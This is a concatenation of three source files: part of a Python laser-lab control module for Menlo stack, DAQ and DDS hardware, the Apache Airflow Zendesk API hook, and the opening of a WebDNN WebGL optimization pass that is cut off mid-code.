"""Temperature of micro-optical bench."""
_LD_CARDS = {
LdDriver.MASTER_OSCILLATOR: menlo_stack.OscCard.OSC1A,
LdDriver.POWER_AMPLIFIER: menlo_stack.OscCard.OSC3B
} # type: Dict[LdDriver, menlo_stack.OscCard]
"""The connection between oscillator supply cards and driven currents."""
class TecUnit(enum.IntEnum):
"""The Menlo stack's TEC controllers."""
MIOB = 1
VHBG = 2
SHGB = 3
SHGA = 4
class SubsystemError(RuntimeError):
"""One of the subsystems experienced a critical problem. Reset is advised.
"""
pass
class Subsystems:
"""Provides a wrapper for all connected subsystems.
The instance will provide access to the Laser at .laser .
"""
def __init__(self) -> None:
# Wait for Menlo to show up and initialize laser control as soon as
# they arrive.
self._menlo = None # type: menlo_stack.MenloStack
self.laser = None # type: ecdl_mopa.EcdlMopa
self._loop = asyncio.get_event_loop() # type: asyncio.AbstractEventLoop
"""The event loop all our tasks will run in."""
asyncio.ensure_future(
tools.poll_resource(
lambda: bool(self._menlo), 5, self.reset_menlo,
self._init_laser, name="Menlo"))
# Initialize the DDS connection and monitor it for connection problems.
# We keep the poller alive to monitor the RS232 connection which got
# stuck sometimes during testing.
self._dds = None # type: dds9_control.Dds9Control
dds_poller = tools.poll_resource(
self.dds_alive, 15, self.reset_dds, continuous=True, name="DDS")
self._dds_poller = self._loop.create_task(dds_poller) # type: asyncio.Task
# The DAQ connection will be established and monitored through polling.
self._daq = None # type: mccdaq.MccDaq
asyncio.ensure_future(tools.poll_resource(
self.daq_alive, 3.7, self.reset_daq, name="DAQ"))
self._temp_ramps = dict() # type: Dict[int, TemperatureRamp]
self._init_temp_ramps()
LOGGER.info("Initialized Subsystems.")
def has_menlo(self) -> bool:
return bool(self._menlo)
def daq_alive(self) -> bool:
"""The DAQ is connected and healthy."""
LOGGER.debug("Checking DAQ health.")
if self._daq and self._daq.ping():
return True
return False
def dds_alive(self) -> bool:
"""The DDS is connected and healthy."""
if self._dds and self._dds.ping():
return True
return False
async def fetch_scan(self, amplitude: float = 1) -> cs.SpecScan:
"""Scan the frequency once and return the readings acquired.
This is the main method used by the `lock_buddy` module to perform
prelock.
:param amplitude: The peak-to-peak amplitude to use for scanning,
ranging [0, 1]. 1 corresponds to
`constants.DAQ_MAX_SCAN_AMPLITUDE`.
:returns: Numpy array of fetched data. There are three columns: "ramp
monitor", "error signal" and "logarithmic port".
:raises ConnectionError: DAQ is unavailable.
"""
blocking_fetch = lambda: self._daq.fetch_scan(
amplitude * cs.DAQ_MAX_SCAN_AMPLITUDE,
cs.DAQ_SCAN_TIME,
[(DaqInput.RAMP_MONITOR, mccdaq.InputRange.PM_10V),
(DaqInput.ERR_SIGNAL, mccdaq.InputRange.PM_1V),
(DaqInput.DETECTOR_LOG, mccdaq.InputRange.PM_5V)],
mccdaq.RampShape.DESCENT)
try:
return await asyncio.get_event_loop().run_in_executor(None, blocking_fetch)
except (AttributeError, ConnectionError) as err:
raise ConnectionError(
"Couldn't fetch signal as DAQ is unavailable.") from err
@tools.static_variable('cache', {'time': 0, 'value': None})
async def get_aux_temps(self, dont_log: bool = False, dont_cache: bool = False) -> List[float]:
"""Read temperatures of auxiliary sensors, as indexed by AuxTemp.
This is cached, as it will be inquired very frequently by the runlevel
mechanisms and would load up the DAQ otherwise.
:raises ConnectionError: Couldn't convince the DAQ to send us data.
"""
if not self._daq:
raise ConnectionError("DAQ not initialized.")
cache = self.get_aux_temps.cache # see decorator # pylint: disable=no-member
if time.time() - cache['time'] < cs.TEMP_CACHE_LIFETIME and not dont_cache:
LOGGER.debug("Returning cached temperatures")
return cache['value']
LOGGER.debug("Actually measuring temperatures.")
# Keep this synchronized with `AuxTemp`!
channels = [(DaqInput.NTC_CELL, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_MO, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_PA, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_SHG, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_MENLO, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_AOM_AMP, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_HEATSINK_A, mccdaq.InputRange.PM_5V),
(DaqInput.NTC_HEATSINK_B, mccdaq.InputRange.PM_5V)]
def fetch_readings() -> List[int]:
return self._daq.sample_channels(channels).tolist()[0] # may raise!
temps = ms_ntc.to_temperatures(
await asyncio.get_event_loop().run_in_executor(None, fetch_readings))
if not dont_log:
logger.log_quantity('daq_temps', '\t'.join([str(t) for t in temps]))
cache['value'] = temps
cache['time'] = time.time()
return temps
async def get_full_set_of_readings(self, since: float = None) -> Dict[str, Union[Buffer, Dict]]:
"""Return a dict of all readings, ready to be sent to the client."""
data = {} # type: Dict[str, Union[Buffer, Dict]]
if self._menlo is None:
return data
# ADC readings
for channel in range(8):
data['adc' + str(channel)] = self._menlo.get_adc_voltage(channel,
since)
# LD current drivers
for name, unit in [('mo', LdDriver.MASTER_OSCILLATOR),
('pa', LdDriver.POWER_AMPLIFIER)]:
data[name + '_enabled'] = self._menlo.is_current_driver_enabled(unit)
data[name + '_current'] = self._menlo.get_diode_current(_LD_CARDS[unit], since)
data[name + '_current_set'] = self._menlo.get_diode_current_setpoint(_LD_CARDS[unit])
# TEC controllers
for name, unit2 in TEC_CONTROLLERS.items(): # unit != unit2 (typing)
unt = TecUnit(unit2)
data[name + '_tec_enabled'] = self._menlo.is_tec_enabled(unt)
data[name + '_temp'] = self._menlo.get_temperature(unt, since)
data[name + '_temp_raw_set'] = self._menlo.get_temp_setpoint(unt)
data[name + '_temp_set'] = self._wrap_into_buffer(
self._temp_ramps[unt].target_temperature)
data[name + '_temp_ok'] = self._menlo.is_temp_ok(unt)
data[name + '_tec_current'] = self._menlo.get_tec_current(unt, since)
# PII Controller
data['nu_lock_enabled'] = self._menlo.is_lock_enabled(LOCKBOX_ID)
data['nu_i1_enabled'] = \
self._menlo.is_integrator_enabled(LOCKBOX_ID, 1)
data['nu_i2_enabled'] = \
self._menlo.is_integrator_enabled(LOCKBOX_ID, 2)
data['nu_ramp_enabled'] = self._menlo.is_ramp_enabled(LOCKBOX_ID)
data['nu_prop'] = self._menlo.get_error_scale(LOCKBOX_ID)
data['nu_offset'] = self._menlo.get_error_offset(LOCKBOX_ID)
data['nu_p_monitor'] = self._menlo.get_pii_monitor(
LOCKBOX_ID, p_only=True, since=since)
data['nu_monitor'] = self._menlo.get_pii_monitor(LOCKBOX_ID,
since=since)
return data
def get_ld_current_setpt(self, unit: LdDriver) -> float:
"""Return the latest laser diode current in milliamperes.
:param unit: The LD driver unit to act on. Either an `LdDriver` enum
member or a plain int may be given.
:raises ValueError: Given unit is not a `LdDriver`
:raises ConnectionError: Requested data couldn't be acquired, probably
because Menlo is not available (yet).
"""
try:
return self._unwrap_buffer(
self._menlo.get_diode_current_setpoint(_LD_CARDS[unit]))
except (ValueError, AttributeError) as err:
raise ConnectionError("Couldn't fetch diode current from Menlo.") from err
async def get_light_levels(self) -> LightSensors:
"""Read levels of auxiliary photodiodes.
:raises ConnectionError: Couldn't convince the DAQ to send us data.
"""
channels = [(getattr(LIGHT_SENSOR_CHANNELS, key),
getattr(LIGHT_SENSOR_GAINS, key))
for key in LightSensors._fields]
def fetch_readings() -> List[int]:
return self._daq.sample_channels(channels).tolist()[0] # may raise!
readings = await self._loop.run_in_executor(None, fetch_readings)
levels = [counts / 2**15 - 1 for counts in readings]
logger.log_quantity('light_levels', '\t'.join([str(l) for l in levels]))
return LightSensors._make(levels)
def get_lockbox_level(self) -> float:
"""The current lockbox control output level.
:raises ConnectionError: Couldn't get a value from Menlo.
"""
try:
return self._unwrap_buffer(self._menlo.get_pii_monitor(LOCKBOX_ID))
except AttributeError as err:
# AttributeError because self._menlo is None.
raise ConnectionError("Couldn't get lockbox level from Menlo.") from err
def get_ramp_offset(self) -> float:
"""The zero position of the ramp used to acquire the error signal"""
return self._daq.ramp_offset
def set_ramp_offset(self, volts: float) -> None:
"""The zero position of the ramp used to acquire the error signal
:param volts: Offset in volts, must be in [-5, 5]
"""
try:
self._daq.ramp_offset = volts
except ValueError:
LOGGER.error("Couldn't set ramp offset.")
LOGGER.debug("Reason:", exc_info=True)
def get_setup_parameters(self) -> Dict[str, Buffer]:
"""Return a dict of all setup parameters.
These are the ones that don't usually change."""
data = {} # type: Dict[str, Buffer]
try:
freqs = self._dds.frequencies
amplitudes = self._dds.amplitudes
phases = self._dds.phases
ext_clock = self._dds.runs_on_ext_clock_source
except (ConnectionError, AttributeError):
LOGGER.warning("Couldn't get setup parameters as DDS is offline")
return data
data['eom_freq'] = self._wrap_into_buffer(freqs[DdsChannel.EOM])
data['aom_freq'] = self._wrap_into_buffer(freqs[DdsChannel.AOM])
data['aom_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.AOM])
data['eom_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.EOM])
data['mixer_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.MIXER])
data['mixer_phase'] = self._wrap_into_buffer(phases[DdsChannel.MIXER])
if isinstance(ext_clock, bool): # May be unknown (None).
data['rf_use_external_clock'] = self._wrap_into_buffer(ext_clock)
return data
def get_temp(self, unit: TecUnit) -> float:
"""Returns the temperature of the given unit in °C.
Consider using this module's provided Enums for choice of unit number.
:param unit: Unique identifier of the temperature to be fetched.
Possible values are in `.TecUnit`, (TODO to be continued...).
:raises ConnectionError: Couldn't get the requested temperature from
from the concerned subsystem.
:raises ValueError: There is no temperature with the ID `unit`.
"""
# The structure right now is more complicated than it would need to be
# (see get_temp_setpt() for comparison), but we prepared this for
# fetching all kinds of temperatures from around the system, not only
# Menlo TEC units.
try:
tec_enum = TecUnit(unit)
except ValueError:
pass
else:
try:
return self._unwrap_buffer(self._menlo.get_temperature(tec_enum))
except (ValueError, AttributeError) as err:
raise ConnectionError("Couldn't fetch temp from Menlo.") from err
raise ValueError("Unknown unit number {}.".format(unit))
def get_temp_setpt(self, unit: TecUnit) -> float:
"""Returns the temperature setpoint of the given unit in °C.
:param unit: The TEC unit to fetch from. See provided enum TecUnit for
available units.
:raises ConnectionError: Couldn't reach the concerned subsystem.
:raises ValueError: The provided unit is not a TecUnit.
"""
try:
return self._unwrap_buffer(self._menlo.get_temp_setpoint(TecUnit(unit)))
except (AttributeError, ValueError) as err:
raise ConnectionError("Couldn't fetch temp. setpt. from Menlo.") from err
def get_temp_ramp_target(self, unit: TecUnit) -> float:
"""Returns the target temperature of the unit's ramp."""
return self._temp_ramps[unit].target_temperature
def is_temp_ramp_enabled(self, unit: TecUnit) -> bool:
"""Is the given TEC unit's temp. ramp currently enabled?"""
return self._temp_ramps[unit].is_running
def is_ld_enabled(self, unit: LdDriver) -> bool:
return self._unwrap_buffer(
self._menlo.is_current_driver_enabled(_LD_CARDS[unit])) == 1
def is_lockbox_ramp_enabled(self) -> bool:
return self._unwrap_buffer(self._menlo.is_ramp_enabled(LOCKBOX_ID)) == 1
def is_tec_enabled(self, unit: TecUnit) -> bool:
"""Is ``unit``'s TEC controller currently running?
:raises ConnectionError: No values have been received (yet).
"""
self._ensure_menlo() # raises ConnectionError
try:
return self._unwrap_buffer(self._menlo.is_tec_enabled(unit)) == 1
except ValueError:
raise ConnectionError("Didn't receive data from Menlo.")
def lockbox_integrators_disabled(self) -> bool:
"""Are all lockbox integrators disengaged?"""
stage_one = int(self._unwrap_buffer(
self._menlo.is_integrator_enabled(LOCKBOX_ID, 1))) == 1
stage_two = int(self._unwrap_buffer(
self._menlo.is_integrator_enabled(LOCKBOX_ID, 2))) == 1
return not stage_one and not stage_two
def lockbox_integrators_enabled(self) -> bool:
"""Are all lockbox integrators engaged?"""
stage_one = int(self._unwrap_buffer(
self._menlo.is_integrator_enabled(LOCKBOX_ID, 1))) == 1
stage_two = int(self._unwrap_buffer(
self._menlo.is_integrator_enabled(LOCKBOX_ID, 2))) == 1
return stage_one and stage_two
def nu_locked(self) -> bool:
"""Is the frequency lock engaged?
:raises ConnectionError: Menlo couldn't be reached.
"""
try:
return self._unwrap_buffer(
self._menlo.is_lock_enabled(LOCKBOX_ID)) == 1
except (AttributeError, ValueError) as err: # Menlo is not available.
raise ConnectionError(
"Can't inquire nu lock state, as Menlo is unavailable.") from err
async def refresh_status(self) -> None:
if self._menlo is not None:
await self._menlo.request_full_status()
def reset_daq(self) -> None:
"""Reset the USB connection to the DAQ. Does not clear internal state.
"""
# For lack of better understanding of the object destruction mechanism,
# we del here before we set it to None.
del self._daq
self._daq = None
try:
attempt = mccdaq.MccDaq(lock_timeout=cs.DAQ_ALLOWABLE_BLOCKING_TIME)
except ConnectionError:
LOGGER.error("Couldn't reset DAQ, as the connection failed.")
LOGGER.debug("Reason:", exc_info=True)
else:
LOGGER.info("Successfully (re-)set DAQ.")
self._daq = attempt
async def reset_dds(self) -> None:
"""Reset the connection to the Menlo subsystem.
This will not raise anything on failure. Use dds_alive() to check
success.
"""
# For lack of better understanding of the object destruction mechanism,
# we del here before we set it to None.
del self._dds
self._dds = None
try:
# The DDS class is written in synchronous style although it
# contains lots of blocking calls. Initialization is the heaviest
# of them all and is thus run in a thread pool executor.
attempt = await self._loop.run_in_executor(
None, partial(dds9_control.Dds9Control, DDS_PORT))
except ConnectionError:
LOGGER.error("Couldn't connect to DDS.")
LOGGER.debug("Couldn't connect to DDS.", exc_info=True)
else:
LOGGER.info("Successfully (re-)set DDS.")
self._dds = attempt
async def reset_menlo(self) -> None:
"""Reset the connection to the Menlo subsystem."""
# For lack of better understanding of the object destruction mechanism,
# we del here before we set it to None.
del self._menlo
self._menlo = None
attempt = menlo_stack.MenloStack()
try:
await attempt.init_async()
except ConnectionError:
LOGGER.error("Couldn't connect to menlo stack.")
LOGGER.debug("Reason:", exc_info=True)
else:
LOGGER.info("Successfully reset Menlo stack.")
self._menlo = attempt
def set_aom_amplitude(self, amplitude: float) -> None:
"""Set the acousto-optic modulator driver amplitude betw. 0 and 1."""
if not isinstance(amplitude, (float, int)) or amplitude < 0:
LOGGER.error("Provide valid amplitude for AOM.")
return
try:
self._dds.set_amplitude(amplitude, int(DdsChannel.AOM))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Set AOM amplitude to %s %%.", amplitude * 100)
def set_aom_frequency(self, freq: float) -> None:
"""Set the acousto-optic modulator driver frequency in MHz."""
if not isinstance(freq, (float, int)) or not freq > 0:
LOGGER.error("Provide valid frequency (float) for AOM.")
return
try:
self._dds.set_frequency(freq, int(DdsChannel.AOM))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Setting AOM frequency to %s MHz.", freq)
def set_current(self, unit: LdDriver, milliamps: float) -> None:
"""Set diode current setpoint of given unit.
:raises SubsystemError: Something went wrong in calling a callback.
"""
try:
if unit == LdDriver.MASTER_OSCILLATOR:
self.laser.set_mo_current(milliamps)
elif unit == LdDriver.POWER_AMPLIFIER:
self.laser.set_pa_current(milliamps)
else:
LOGGER.error("No such laser diode.")
except ValueError:
LOGGER.error("Failed to set laser current.")
LOGGER.debug("Reason:", exc_info=True)
except ecdl_mopa.CallbackError as err:
raise SubsystemError("Critical error in osc. sup. unit!") from err
LOGGER.info("Set diode current of unit %s to %s mA", unit, milliamps)
def set_eom_amplitude(self, amplitude: float) -> None:
"""Set the electro-optic modulator driver amplitude betw. 0 and 1."""
if not isinstance(amplitude, (float, int)) or amplitude < 0:
LOGGER.error("Provide valid amplitude for EOM.")
return
try:
self._dds.set_amplitude(amplitude, int(DdsChannel.EOM))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Set EOM amplitude to %s %%.", amplitude * 100)
def set_eom_frequency(self, freq: float) -> None:
"""Set the EOM and mixer frequency in MHz."""
if not isinstance(freq, (float, int)) or not freq > 0:
LOGGER.error("Provide valid frequency (float) for EOM.")
return
try:
self._dds.set_frequency(freq, int(DdsChannel.EOM))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Set EOM frequency to %s MHz.", freq)
def set_error_offset(self, millivolts: float) -> None:
"""Offset to be added to error signal before feeding into lockbox."""
try:
millivolts = float(millivolts)
except (TypeError, ValueError):
LOGGER.error("Please give a number for error signal offset.")
LOGGER.debug("Reason:", exc_info=True)
return
self._menlo.set_error_offset(LOCKBOX_ID, millivolts)
def set_error_scale(self, factor: float) -> None:
"""Set the scaling factor for error signal input to lockbox."""
try:
factor = float(factor)
except (TypeError, ValueError):
LOGGER.error("Please give a number for scaling factor.")
LOGGER.debug("Reason:", exc_info=True)
return
self._menlo.set_error_scale(LOCKBOX_ID, factor)
def set_mixer_amplitude(self, amplitude: float) -> None:
"""Set the mixer driver amplitude betw. 0 and 1."""
if not isinstance(amplitude, (float, int)) or amplitude < 0:
LOGGER.error("Provide valid amplitude for mixer.")
return
try:
self._dds.set_amplitude(amplitude, int(DdsChannel.MIXER))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Set mixer amplitude to %s %%.", amplitude * 100)
def set_mixer_frequency(self, freq: float) -> None:
"""Set the Mixer frequency in MHz. Will usually be identical to EOM."""
if not isinstance(freq, (float, int)) or not freq > 0:
LOGGER.error("Provide valid frequency (float) for Mixer.")
return
try:
self._dds.set_frequency(freq, int(DdsChannel.MIXER))
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Set mixer frequency to %s MHz.", freq)
def set_mixer_phase(self, degrees: float) -> None:
"""Set the phase offset between EOM and mixer drivers in degrees."""
if not isinstance(degrees, (float, int)):
LOGGER.error("Provide a mixer phase in degrees (%s given).", degrees)
return
try:
# To set the phase difference, we need to set phases of both channels.
self._dds.set_phase(0, int(DdsChannel.EOM))
self._dds.set_phase(degrees, int(DdsChannel.MIXER))
except (AttributeError, ConnectionError):
LOGGER.error("Can't set phase as DDS is offline")
else:
LOGGER.debug("Set mixer phase to %s°", degrees)
def set_temp(self, unit: TecUnit, celsius: float, bypass_ramp: bool = False) -> None:
"""Set the target temp. for the temperature ramp."""
try:
temp = float(celsius)
except (TypeError, ArithmeticError, ValueError):
LOGGER.error("Couldn't convert temp setting %s to float.", celsius)
return
try:
unit = TecUnit(unit)
except (ValueError, TypeError):
LOGGER.error("Invalid unit: %s.", unit)
LOGGER.debug("Reason:", exc_info=True)
else:
if bypass_ramp:
LOGGER.debug("Setting TEC temp. of unit %s to %s°C directly.",
unit, temp)
self._menlo.set_temp(unit, temp)
else:
LOGGER.debug("Setting ramp target temp. of unit %s to %s°C",
unit, temp)
ramp = self._temp_ramps[unit]
ramp.target_temperature = temp
def switch_rf_clock_source(self, which: str) -> None:
"""Pass "external" or "internal" to switch RF clock source."""
if which not in ['external', 'internal']:
LOGGER.error('Can only switch to "external" or "internal" '
'reference, "%s" given.', which)
return
try:
if which == 'external':
self._dds.switch_to_ext_reference()
else: # str == 'internal'
self._dds.switch_to_int_reference()
except (AttributeError, ConnectionError):
LOGGER.error("DDS offline.")
else:
LOGGER.info("Switched to %s clock reference.", which)
def switch_integrator(
self, stage: int, switch_on: bool) -> None:
"""Switch the given PII integrator stage (1 or 2) on or off.
:param stage: Which stage to act on--1 (fast) or 2 (slow)
:param switch_on: True for enabling integrator false for disabling it
"""
if stage not in [1, 2]:
LOGGER.error("Please provide integrator stage: 1 or 2. Given: %s",
stage)
return
if not isinstance(switch_on, bool):
LOGGER.error("Provide boolean \"is_instance\" whether to switch "
"stage on. Given: %s", switch_on)
return
self._menlo.switch_integrator(LOCKBOX_ID, stage, switch_on)
def switch_ld(self, unit: LdDriver, switch_on: bool) -> None:
"""
:raises SubsystemError:
"""
try:
if unit == LdDriver.MASTER_OSCILLATOR:
if switch_on:
self.laser.enable_mo()
else:
self.laser.disable_mo()
elif unit == LdDriver.POWER_AMPLIFIER:
if switch_on:
self.laser.enable_pa()
else:
self.laser.disable_pa()
else:
LOGGER.error('Can only set current for either "mo" or "pa".')
except ValueError:
LOGGER.error("Couldn't switch LD")
LOGGER.debug("Reason:", exc_info=True)
except ecdl_mopa.CallbackError:
LOGGER.error("Critical error in osc. sup. unit!")
LOGGER.debug("Reason:", exc_info=True)
raise SubsystemError("Critical error in osc. sup. unit!")
def switch_lock(self, switch_on: bool) -> None:
if isinstance(switch_on, bool):
self._menlo.switch_lock(LOCKBOX_ID, switch_on)
else:
LOGGER.error("Please provide boolean \"on\" argument when "
"switching pii lock electronics.")
def switch_pii_ramp(self, switch_on: bool) -> None:
if isinstance(switch_on, bool):
self._menlo.switch_ramp(LOCKBOX_ID, switch_on)
else:
LOGGER.error('Please provide boolean "on" argument when '
'switching pii ramp generation.')
def switch_tec(self, unit_name: str, switch_on: bool) -> None:
if self._is_tec_unit(unit_name):
if isinstance(switch_on, bool):
self._menlo.switch_tec(TEC_CONTROLLERS[unit_name], switch_on)
def switch_tec_by_id(self, unit: TecUnit, switch_on: bool) -> None:
"""Like switch_tec(), but using the unit ID instead of name."""
try:
unit = TecUnit(unit)
except (ValueError, TypeError):
LOGGER.error("Invalid unit: %s.", unit)
LOGGER.debug("Reason:", exc_info=True)
if isinstance(switch_on, bool):
self._menlo.switch_tec(unit, switch_on)
def switch_temp_ramp(self, unit: TecUnit, enable: bool) -> None:
"""Start or halt ramping the temperature setpoint."""
try:
unit = TecUnit(unit)
except (ValueError, TypeError):
LOGGER.error("TEC unit %s doesn't exist.", unit)
LOGGER.debug("Reason:", exc_info=True)
else:
if enable:
self._temp_ramps[unit].start_ramp()
else:
self._temp_ramps[unit].pause_ramp()
# Private Methods
def _ensure_menlo(self) -> None:
if not self._menlo:
raise ConnectionError("Menlo stack is not initialized yet.")
def _init_laser(self) -> None:
# Initalize a laser controller class using the methods that the menlo
# stack current drivers expose.
get_mo = partial(self._menlo.get_diode_current,
unit=_LD_CARDS[LdDriver.MASTER_OSCILLATOR])
get_pa = partial(self._menlo.get_diode_current,
unit=_LD_CARDS[LdDriver.POWER_AMPLIFIER])
set_mo = partial(self._menlo.set_current,
unit=_LD_CARDS[LdDriver.MASTER_OSCILLATOR])
set_pa = partial(self._menlo.set_current,
unit=_LD_CARDS[LdDriver.POWER_AMPLIFIER])
mo_on = partial(self.is_ld_enabled, LdDriver.MASTER_OSCILLATOR)
pa_on = partial(self.is_ld_enabled, LdDriver.POWER_AMPLIFIER)
# TODO: phase out use of legacy unit indexing
mo_id = LdDriver.MASTER_OSCILLATOR # Will be resolved to integers...
pa_id = LdDriver.POWER_AMPLIFIER
disable_mo = partial(self._menlo.switch_ld, switch_on=False, unit_number=mo_id)
disable_pa = partial(self._menlo.switch_ld, switch_on=False, unit_number=pa_id)
enable_mo = partial(self._menlo.switch_ld, switch_on=True, unit_number=mo_id)
enable_pa = partial(self._menlo.switch_ld, switch_on=True, unit_number=pa_id)
milas = ecdl_mopa.MopaSpec(
mo_max=cs.MILAS_MO_MAX,
mo_seed=cs.MILAS_MO_SEED,
pa_max=cs.MILAS_PA_MAX,
pa_transparency=cs.MILAS_PA_TRANSPARENCY,
pa_backfire=cs.MILAS_PA_BACKFIRE)
self.laser = ecdl_mopa.EcdlMopa(
laser_specification=milas,
# _unwrap_buffer may raise if there's no data yet, spoiling laser
# operations.
get_mo_callback=lambda: self._unwrap_buffer(get_mo()),
get_pa_callback=lambda: self._unwrap_buffer(get_pa()),
set_mo_callback=lambda c: set_mo(milliamps=c),
set_pa_callback=lambda c: set_pa(milliamps=c),
disable_mo_callback=disable_mo,
disable_pa_callback=disable_pa,
enable_mo_callback=enable_mo,
enable_pa_callback=enable_pa,
is_mo_enabled=mo_on,
is_pa_enabled=pa_on)
def _init_temp_ramps(self) -> None:
"""Initialize one TemperatureRamp instance for every TEC controller."""
# TODO: Use functools.partials instead of default arguments to enforce
# early binding.
for name, unit in TEC_CONTROLLERS.items():
def getter(bound_unit: int = unit) -> float:
"""Get the most recent temperature reading from MenloStack."""
# We need to bind the loop variable "unit" to a local variable
# here, e.g. using lambdas.
temp_readings = self._menlo.get_temperature(bound_unit)
if temp_readings:
return self._unwrap_buffer(temp_readings)
raise ConnectionError("Couldn't determine temperature.")
def setpt_getter(bound_unit: int = unit) -> float:
"""Gets the current TEC setpoint."""
temp_setpts = self._menlo.get_temp_setpoint(bound_unit)
if temp_setpts:
return self._unwrap_buffer(temp_setpts)
raise ConnectionError("Couldn't determine temp. setpoint.")
def setter(temp: float, bound_unit: int = unit) -> None:
# Same here (see above).
self._menlo.set_temp(bound_unit, temp)
self._temp_ramps[unit] = TemperatureRamp(
get_temp_callback=getter,
get_temp_setpt_callback=setpt_getter,
set_temp_callback=setter,
name=name)
# Set maximum allowable temperature gradients according to the
# datasheets or educated guesses.
self._temp_ramps[TecUnit.MIOB].maximum_gradient = 1/60
self._temp_ramps[TecUnit.VHBG].maximum_gradient = 1/5
self._temp_ramps[TecUnit.SHGA].maximum_gradient = 1/5
self._temp_ramps[TecUnit.SHGB].maximum_gradient = 1/5
def _is_tec_unit(self, name: str) -> bool:
if self._menlo is None:
return False
if name not in TEC_CONTROLLERS:
LOGGER.error('There is no TEC controller named "%s".', name)
return False
return True
@staticmethod
def _wrap_into_buffer(value: Union[MenloUnit, bool]) -> Buffer:
if isinstance(value, bool):
return [(time.time(), 1 if value else 0)] # bool is no MenloUnit
if isinstance(value, float):
return [(time.time(), float(value))] # float(): make mypy happy
if isinstance(value, int):
return [(time.time(), int(value))] # int(): make mypy happy
if value is None:
# Don't throw an error here, as None might just be an indication
# that there isn't any data available yet.
return []
LOGGER.error("Type %s is not convertible into a MenloUnit.",
type(value))
return []
@staticmethod
def _unwrap_buffer(buffer: Buffer) -> MenloUnit:
# Extract the latest reading from a buffer if possible. Raises!
try:
return buffer[0][1]
except IndexError as err:
raise ValueError("Buffer is empty!") from err
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
from typing import Optional
from zdesk import RateLimitError, Zendesk, ZendeskError
from airflow.hooks.base_hook import BaseHook
class ZendeskHook(BaseHook):
"""A hook to talk to Zendesk"""
def __init__(self, zendesk_conn_id: str) -> None:
super().__init__()
self.__zendesk_conn_id = zendesk_conn_id
self.__url = None
def get_conn(self) -> Zendesk:
conn = self.get_connection(self.__zendesk_conn_id)
self.__url = "https://" + conn.host
return Zendesk(
zdesk_url=self.__url, zdesk_email=conn.login, zdesk_password=<PASSWORD>, zdesk_token=True
)
def __handle_rate_limit_exception(self, rate_limit_exception: ZendeskError) -> None:
"""
Sleep for the time specified in the exception. If not specified, wait
for 60 seconds.
"""
retry_after = int(rate_limit_exception.response.headers.get('Retry-After', 60))
self.log.info("Hit Zendesk API rate limit. Pausing for %s seconds", retry_after)
time.sleep(retry_after)
def call(
self,
path: str,
query: Optional[dict] = None,
get_all_pages: bool = True,
side_loading: bool = False,
) -> dict:
"""
Call Zendesk API and return results
:param path: The Zendesk API to call
:param query: Query parameters
:param get_all_pages: Accumulate results over all pages before
returning. Due to strict rate limiting, this can often timeout.
Waits for recommended period between tries after a timeout.
:param side_loading: Retrieve related records as part of a single
request. In order to enable side-loading, add an 'include'
query parameter containing a comma-separated list of resources
to load. For more information on side-loading see
https://developer.zendesk.com/rest_api/docs/core/side_loading
"""
query_params = query or {}
zendesk = self.get_conn()
first_request_successful = False
while not first_request_successful:
try:
results = zendesk.call(path, query_params)
first_request_successful = True
except RateLimitError as rle:
self.__handle_rate_limit_exception(rle)
# Find the key with the results
keys = [path.split("/")[-1].split(".json")[0]]
next_page = results['next_page']
if side_loading:
keys += query_params['include'].split(',')
results = {key: results[key] for key in keys}
# pylint: disable=too-many-nested-blocks
if get_all_pages:
while next_page is not None:
try:
# Need to split because the next page URL has
# `github.zendesk...`
# in it, but the call function needs it removed.
next_url = next_page.split(self.__url)[1]
self.log.info("Calling %s", next_url)
more_res = zendesk.call(next_url)
for key in results:
results[key].extend(more_res[key])
if next_page == more_res['next_page']:
# Unfortunately zdesk doesn't always throw ZendeskError
# when we are done getting all the data. Sometimes the
# next just refers to the current set of results.
# Hence, need to deal with this special case
break
next_page = more_res['next_page']
except RateLimitError as rle:
self.__handle_rate_limit_exception(rle)
except ZendeskError as zde:
if b"Use a start_time older than 5 minutes" in zde.msg:
# We have pretty up to date data
break
raise zde
return results
|
# Use RGBA channel in WebGL2
from typing import Dict, Iterable, List, Optional
import numpy as np
import onnx
from webdnn.optimization_pass_result_webgl import OptimizationPassResultWebGL
from webdnn.optimization_pass import OptimizationPass, OptimizationPassResult
from webdnn.onnx_util import tensor_proto_to_numpy, get_attr_int
from webdnn.operator_shader_webgl import OperatorShaderWebGL
SHADER_CODE = """import {
shaderGenHeader,
shaderGenOutput,
shaderGenTensorNDGetUniformItem,
shaderGenTensorOutputCoordsWithReturn,
shaderGenTensorOutputUniform,
shaderGenTensorOutputUniformItem,
} from "../../shaderHelper";
import {
WebDNNWebGLContext,
WebGLUniformItem,
} from "../../../../interface/backend/webgl/webglContext";
import { Tensor } from "../../../../interface/core/tensor";
import { WebGLTensor } from "../../../../interface/backend/webgl/webglTensor";
import { OperatorEntry } from "../../../../interface/core/operator";
import { calcStrides } from "../../../operatorUtil";
import { OperatorImpl } from "../../../operatorImpl";
// Version 13
class MatMulNT141 extends OperatorImpl {
constructor() {
super("webgl");
}
protected calcShapeNT141(
dimsA: ReadonlyArray<number>,
